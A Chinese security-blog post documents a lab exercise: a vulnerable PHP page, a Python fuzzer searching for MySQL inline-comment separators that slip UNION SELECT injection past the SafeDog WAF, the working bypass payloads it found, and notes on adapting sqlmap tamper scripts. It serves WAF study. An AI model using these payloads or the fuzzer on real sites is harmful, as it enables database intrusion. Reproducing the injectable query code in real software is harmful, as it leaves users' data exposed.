<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.1" rel="stylesheet" type="text/css">


  <meta name="keywords" content="Web安全,tools,">








  <link rel="shortcut icon" type="image/x-icon" href="/images/111.png?v=5.1.1">






<meta name="description" content="你的时间有限，所以不要为别人而活。不要被教条所限，不要活在别人的观念里。不要让别人的意见左右自己内心的声音。最重要的是，勇敢的去追随自己的心灵和直觉，只有自己的心灵和直觉才知道你自己的真实想法，其他一切都是次要。                              —– 乔布斯">
<meta name="keywords" content="Web安全,tools">
<meta property="og:type" content="article">
<meta property="og:title" content="Python Fuzzing脚本编写学习">
<meta property="og:url" content="http://yoursite.com/2018/06/12/Python-Fuzzing脚本编写学习/index.html">
<meta property="og:site_name" content="Yokeen&#39;s blog">
<meta property="og:description" content="你的时间有限，所以不要为别人而活。不要被教条所限，不要活在别人的观念里。不要让别人的意见左右自己内心的声音。最重要的是，勇敢的去追随自己的心灵和直觉，只有自己的心灵和直觉才知道你自己的真实想法，其他一切都是次要。                              —– 乔布斯">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/22779352.jpg">
<meta property="og:image" content="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/39084283.jpg">
<meta property="og:image" content="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/75951023.jpg">
<meta property="og:image" content="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/2835128.jpg">
<meta property="og:image" content="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/90211921.jpg">
<meta property="og:image" content="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/8285460.jpg">
<meta property="og:image" content="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/67117713.jpg">
<meta property="og:image" content="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/59841351.jpg">
<meta property="og:image" content="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/40025196.jpg">
<meta property="og:image" content="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/38165436.jpg">
<meta property="og:image" content="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/54325877.jpg">
<meta property="og:image" content="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/55463179.jpg">
<meta property="og:image" content="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/92297979.jpg">
<meta property="og:image" content="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/45202933.jpg">
<meta property="og:image" content="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/94260886.jpg">
<meta property="og:image" content="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-13/31228600.jpg">
<meta property="og:image" content="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-13/55060872.jpg">
<meta property="og:image" content="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-13/28429667.jpg">
<meta property="og:image" content="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-13/72990034.jpg">
<meta property="og:image" content="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/68760534.jpg">
<meta property="og:image" content="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/82400340.jpg">
<meta property="og:image" content="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/67561223.jpg">
<meta property="og:image" content="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-13/27252595.jpg">
<meta property="og:image" content="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-13/64188485.jpg">
<meta property="og:updated_time" content="2018-11-29T13:32:53.198Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Python Fuzzing脚本编写学习">
<meta name="twitter:description" content="你的时间有限，所以不要为别人而活。不要被教条所限，不要活在别人的观念里。不要让别人的意见左右自己内心的声音。最重要的是，勇敢的去追随自己的心灵和直觉，只有自己的心灵和直觉才知道你自己的真实想法，其他一切都是次要。                              —– 乔布斯">
<meta name="twitter:image" content="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/22779352.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"always","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: 'undefined',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: "",
      labels: ""
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/06/12/Python-Fuzzing脚本编写学习/">





  <title>Python Fuzzing脚本编写学习 | Yokeen's blog</title>
  





  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?12246f7e36b6d790ccbbfabf73da926b";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>










</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Yokeen's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope="" itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/06/12/Python-Fuzzing脚本编写学习/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Yokeen">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/beiy.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Yokeen's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Python Fuzzing脚本编写学习</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-06-12T11:22:41+08:00">
                2018-06-12
              </time>
            

            

            
          </span>

          

          
            
          

          
          
             <span id="/2018/06/12/Python-Fuzzing脚本编写学习/" class="leancloud_visitors" data-flag-title="Python Fuzzing脚本编写学习">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数 </span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          

        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>你的时间有限，所以不要为别人而活。不要被教条所限，不要活在别人的观念里。不要让别人的意见左右自己内心的声音。最重要的是，勇敢的去追随自己的心灵和直觉，只有自己的心灵和直觉才知道你自己的真实想法，其他一切都是次要。<br>                              —– 乔布斯<br><a id="more"></a></p>
<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>脚本很简单，练练手。</p>
<p>站点安装了最新的safe狗，简单搭建了一个注入页面进行注入测试。<br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/22779352.jpg" alt=""><br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/39084283.jpg" alt=""><br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/75951023.jpg" alt=""><br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$conn = mysql_connect(<span class="string">'localhost'</span>, <span class="string">'root'</span>, <span class="string">'123456'</span>) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">'bad!'</span>);</span><br><span class="line">mysql_query(<span class="string">"SET NAMES binary'"</span>);</span><br><span class="line">mysql_select_db(<span class="string">'test'</span>, $conn) <span class="keyword">OR</span> emMsg(<span class="string">"数据库连接失败"</span>);</span><br><span class="line"></span><br><span class="line">$id = <span class="keyword">isset</span>($_GET[<span class="string">'id'</span>]) ? $_GET[<span class="string">'id'</span>] : <span class="number">1</span>;</span><br><span class="line">$sql = <span class="string">"SELECT * FROM news WHERE id=$id"</span>;</span><br><span class="line">$result = mysql_query($sql, $conn) <span class="keyword">or</span> <span class="keyword">die</span>(mysql_error()); </span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">    &lt;meta charset=<span class="string">"utf-8"</span> /&gt;</span><br><span class="line">    &lt;title&gt;Test demo&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">echo</span> $sql;</span><br><span class="line">$row = mysql_fetch_array($result, MYSQL_ASSOC);</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">"&lt;h3&gt;&#123;$row['title']&#125;&lt;br /&gt;  &#123;$row['content']&#125;"</span>;</span><br><span class="line">mysql_free_result($result);</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure></p>
<p><strong>先关闭WAF，手动测试。</strong><br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/2835128.jpg" alt=""><br>正常。</p>
<p><strong>开启WAF，手动测试。</strong><br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/90211921.jpg" alt=""><br>拦截。</p>
<h1 id="Fuzzing脚本编写"><a href="#Fuzzing脚本编写" class="headerlink" title="Fuzzing脚本编写"></a>Fuzzing脚本编写</h1><p>使用MySQL内联注释来对其进行绕过</p>
<p>MySQL注释<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**/</span></span><br></pre></td></tr></table></figure></p>
<p>在    /* 后加上! 里边的语句也依旧会执行<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*!select * from xxx*/</span></span><br></pre></td></tr></table></figure></p>
<p><strong><font color="green">url：<a href="http://192.168.25.133/sql.php?id=1" target="_blank" rel="noopener">http://192.168.25.133/sql.php?id=1</a></font></strong></p>
<p>编写py脚本来进行fuzzing union和select之间的空格，只嵌套了四层，对这个脚本也还没进行优化，因为收集了另外一些比较好的Fuzz脚本，完了在学习学习</p>
<p>id=1的时候所出现的值为hhhhtest，所以只判断当加入了payload时，此值会不会出现在页面中，以此来判断是否成功</p>
<p><strong>运行脚本前记得把waf的防cc攻击关闭，不然会ban ip</strong><br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!-*- coding:utf-8 -*-</span></span><br><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> requests, sys</span><br><span class="line"></span><br><span class="line">fuzz_zs = [<span class="string">'/*'</span>,<span class="string">'*/'</span>,<span class="string">'/*!'</span>,<span class="string">'/**/'</span>,<span class="string">'?'</span>,<span class="string">'/'</span>,<span class="string">'*'</span>,<span class="string">'='</span>,<span class="string">'`'</span>,<span class="string">'~'</span>,<span class="string">'@'</span>,<span class="string">'|'</span>,<span class="string">'!'</span>,<span class="string">'%'</span>,<span class="string">'.'</span>,<span class="string">'-'</span>,<span class="string">'+'</span>,<span class="string">'%00'</span>,<span class="string">'%20'</span>,<span class="string">'%09'</span>,<span class="string">'%0a'</span>,<span class="string">'%0d'</span>,<span class="string">'%0c'</span>,<span class="string">'%0d'</span>,<span class="string">'%a0'</span>]</span><br><span class="line">fuzz_sz = [<span class="string">''</span>]</span><br><span class="line">fuzz_ch = [<span class="string">'%0a'</span>,<span class="string">'%0d'</span>,<span class="string">'%0c'</span>,<span class="string">'%0d'</span>,<span class="string">'%0e'</span>,<span class="string">'%0f'</span>,<span class="string">'%0g'</span>,<span class="string">'%0h'</span>,<span class="string">'%0i'</span>,<span class="string">'%0j'</span>,<span class="string">'%0h'</span>,<span class="string">'%0i'</span>,<span class="string">'%0j'</span>,<span class="string">'%0k'</span>,<span class="string">'%0l'</span>,<span class="string">'%0m'</span>,<span class="string">'%0n'</span>,<span class="string">'%0o'</span>,<span class="string">'%0p'</span>,<span class="string">'%0q'</span>,<span class="string">'%0r'</span>,<span class="string">'%0s'</span>,<span class="string">'%0t'</span>,<span class="string">'%0u'</span>,<span class="string">'%0v'</span>,<span class="string">'%0w'</span>,<span class="string">'%0x'</span>,<span class="string">'%0y'</span>,<span class="string">'%0z'</span>]</span><br><span class="line"></span><br><span class="line">fuzz = fuzz_zs + fuzz_sz + fuzz_ch</span><br><span class="line">headers = &#123;<span class="string">'User-Agent'</span>: <span class="string">'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'</span>&#125;</span><br><span class="line"></span><br><span class="line">url_start = <span class="string">'http://192.168.25.133/sql.php?id=1'</span></span><br><span class="line"></span><br><span class="line">lens = len(fuzz)**<span class="number">4</span></span><br><span class="line">num = <span class="number">0</span></span><br><span class="line"><span class="comment">#只嵌套了4层</span></span><br><span class="line"><span class="keyword">for</span> a <span class="keyword">in</span> fuzz:</span><br><span class="line">	<span class="keyword">for</span> b <span class="keyword">in</span> fuzz:</span><br><span class="line">		<span class="keyword">for</span> c <span class="keyword">in</span> fuzz:</span><br><span class="line">			<span class="keyword">for</span> d <span class="keyword">in</span> fuzz:</span><br><span class="line">				num += <span class="number">1</span></span><br><span class="line">				payload = <span class="string">"/*!union"</span> + a + b + c + d + <span class="string">"select*/ 1,2,3"</span></span><br><span class="line">				url = url_start + payload</span><br><span class="line">				print(<span class="string">"Now URL:"</span> + url)</span><br><span class="line">				<span class="keyword">print</span> <span class="string">"Process %s / %s"</span>%(num,str(lens))</span><br><span class="line">				<span class="comment"># sys.stdout.write("Process：%s / %s \r"%(num,str(lens)))</span></span><br><span class="line">				<span class="comment"># sys.stdout.flush()</span></span><br><span class="line">				res = requests.get(url,headers=headers)</span><br><span class="line">				<span class="keyword">if</span> <span class="string">"hhhhtest"</span> <span class="keyword">in</span> res.text:</span><br><span class="line">					<span class="keyword">with</span> open(<span class="string">'Result.txt'</span>,<span class="string">'a'</span>) <span class="keyword">as</span> r:</span><br><span class="line">						r.write(url + <span class="string">"\n"</span>)</span><br></pre></td></tr></table></figure></p>
<p><strong><font color="red">所获payload：</font></strong><br><a href="http://192.168.25.133/sql.php?id=1/*!union/*/*%/**/select*/" target="_blank" rel="noopener">http://192.168.25.133/sql.php?id=1/*!union/*/*%/**/select*/</a> 1,2,3<br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/8285460.jpg" alt=""><br><a href="http://192.168.25.133/sql.php?id=1/*!union*//*/*%/**//*!select*/%201,2,3" target="_blank" rel="noopener">http://192.168.25.133/sql.php?id=1/*!union*//*/*%/**//*!select*/%201,2,3</a><br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/67117713.jpg" alt=""></p>
<p>没有被拦截，当然下一步骤如果要找表名列名也还是会被拦截，因为会对一些系统函数以及特殊关键字进行一定的拦截，这个绕过就属于其他方法。</p>
<p>绕过空格的也不能说很鸡肋，也学习到了一个特性，mysql函数的字母和括号之间是可以用空格的。<br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/59841351.jpg" alt=""></p>
<p>所以根据这个特性，对其来使用payload进行绕过。<br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/40025196.jpg" alt=""><br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/38165436.jpg" alt=""></p>
<p>因为查询出来了两条数据，而只有一个显位，所以要将上一条语句报错，从而使得下一条语句的结果输出到上一条语句的位置上。</p>
<p>在这还要说一下的就是union注入的条件：1、相同的列数，2、相似的数据编码，3、相同的数据类型。<br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/54325877.jpg" alt=""></p>
<p>OJBK。</p>
<h1 id="修改sqlmap进行注入绕过"><a href="#修改sqlmap进行注入绕过" class="headerlink" title="修改sqlmap进行注入绕过"></a>修改sqlmap进行注入绕过</h1><p>sqlmap无疑是自动化注入的神器，当我们测出payload但是工具却注入不了，除了以前学习的修改sqlmap源码中的发包方式，二来就是需要我们去写sqlmap脚本。</p>
<p><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/55463179.jpg" alt=""></p>
<p>先查看两个脚本：<br>versionedkeywords————用mysql注释包围每个关键字<br>versionedmorekeywords————用mysql注释包围每个非函数关键字<br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/92297979.jpg" alt=""><br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/45202933.jpg" alt=""><br>发现脚本中将关键字都被/*!xxx*/所包围</p>
<p>用sqlmap跑一下看内置的内不能过了WAF<br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/94260886.jpg" alt=""></p>
<p><strong>我们得到的这款payload：</strong><br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sql.php?id=1/*!union/*/*%/**/select*/ 1,2,3</span><br><span class="line">sql.php?id=1/*!union*//*/*%/**//*!select*/ 1,2,3</span><br></pre></td></tr></table></figure></p>
<p><strong>原视频中测试的payload</strong><br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sql.php?id=1 /*!/*!union*//*!/*!select*/ 1,2,3</span><br></pre></td></tr></table></figure></p>
<p>修改起来很简单，直接在原来的/*!前边再重复一次就可以了<br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-13/31228600.jpg" alt=""><br>然后指定脚本就可以对目标URL进行注入了。</p>
<p>fuzz之后可以对比一下，看payload有没有特定的规律，对fuzz payload的位置进行一些测试</p>
<h2 id="方法一：修改发包函数："><a href="#方法一：修改发包函数：" class="headerlink" title="方法一：修改发包函数："></a>方法一：修改发包函数：</h2><p>还是老办法啦，在发包函数中进行修改，因为这里测试的是union查询，所以直接修改union发包函数，在里边加上我们的payload<br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-13/55060872.jpg" alt=""><br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-13/28429667.jpg" alt=""><br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-13/72990034.jpg" alt=""></p>
<p>OK，发包也满足我们所测试得出payload的基本格式，实际拿过去测试也是OK，但是sqlmap并没有测成功。</p>
<p>因为对于有些关键字进行了绕过，而对于很多sqlmap发包时的比如像一些函数，他并不会把函数名称和括号进行这样的匹配，总的来说想要探其根源还是得老老实实把sqlmap这款优秀工具的源码读一遍，留作业。</p>
<h2 id="方法二：修改tamper脚本"><a href="#方法二：修改tamper脚本" class="headerlink" title="方法二：修改tamper脚本"></a>方法二：修改tamper脚本</h2><p>测试得到的两款payload，都差不多，只不过是一个闭合了单个关键字的注释一个没有，都是使用/*/*%/**/来将关键字隔开。</p>
<p><strong><font color="green">针对payload来对tamper脚本进行修改：</font></strong><br>因为是使用mysql注释来进行关键字的闭合，所以看一下原脚本是怎么用的，在里边微调一下就OJBK了。</p>
<p><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/68760534.jpg" alt=""><br>payload中对关键字两边使用了/*!word*/中间的空格使用了/*/*%/**/所以我们将其修改为我们payload所对应的格式并重新保存。</p>
<p>确定脚本中变动的位置<br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/82400340.jpg" alt=""><br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-12/67561223.jpg" alt=""></p>
<p>第一个位置：</p>
<p><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-13/27252595.jpg" alt=""></p>
<p>在关键字的闭合后添加，但是会导致脚本出错，还没读源码</p>
<p>第二个位置：</p>
<p><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-6-13/64188485.jpg" alt=""></p>
<p>当检索到payload关键字中*/space，将其更改为*/payload。</p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        
  <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
    <div>坚持原创技术分享，您的支持将鼓励我继续创作！</div>
    <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
      <span>赏</span>
    </button>
    <div id="QR" style="display: none;">
      
        <div id="wechat" style="display: inline-block">
          <img id="wechat_qr" src="/images/wechat.png" alt="Yokeen WeChat Pay">
          <p>微信打赏</p>
        </div>
      
      
        <div id="alipay" style="display: inline-block">
          <img id="alipay_qr" src="/images/alipay.jpg" alt="Yokeen Alipay">
          <p>支付宝打赏</p>
        </div>
      
    </div>
  </div>


      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Web安全/" rel="tag"># Web安全</a>
          
            <a href="/tags/tools/" rel="tag"># tools</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/06/11/Webshell工作原理与免杀/" rel="next" title="Webshell工作原理与免杀学习">
                <i class="fa fa-chevron-left"></i> Webshell工作原理与免杀学习
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/06/28/Django中的基础攻防测试/" rel="prev" title="Django基础开发与攻防测试[入门篇]">
                Django基础开发与攻防测试[入门篇] <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
        <!-- JiaThis Button BEGIN -->
<div class="jiathis_style">
  <a class="jiathis_button_tsina"></a>
  <a class="jiathis_button_tqq"></a>
  <a class="jiathis_button_weixin"></a>
  <a class="jiathis_button_cqq"></a>
  <a class="jiathis_button_douban"></a>
  <a class="jiathis_button_renren"></a>
  <a class="jiathis_button_qzone"></a>
  <a class="jiathis_button_kaixin001"></a>
  <a class="jiathis_button_copy"></a>
  <a href="http://www.jiathis.com/share" class="jiathis jiathis_txt jiathis_separator jtico jtico_jiathis" target="_blank"></a>
  <a class="jiathis_counter_style"></a>
</div>
<script type="text/javascript">
  var jiathis_config={
    hideMore:false
  }
</script>
<script type="text/javascript" src="http://v3.jiathis.com/code/jia.js" charset="utf-8"></script>
<!-- JiaThis Button END -->

      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image" src="/images/beiy.jpg" alt="Yokeen">
          <p class="site-author-name" itemprop="name">Yokeen</p>
           
              <p class="site-description motion-element" itemprop="description">无所畏惧，勇往直前</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives/">
                <span class="site-state-item-count">40</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">2</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">10</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/Yokeen" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              Links
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="https://www.test404.com" title="Test404'Blog" target="_blank">Test404'Blog</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.lmxspace.com" title="l1nk3r's blog" target="_blank">l1nk3r's blog</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
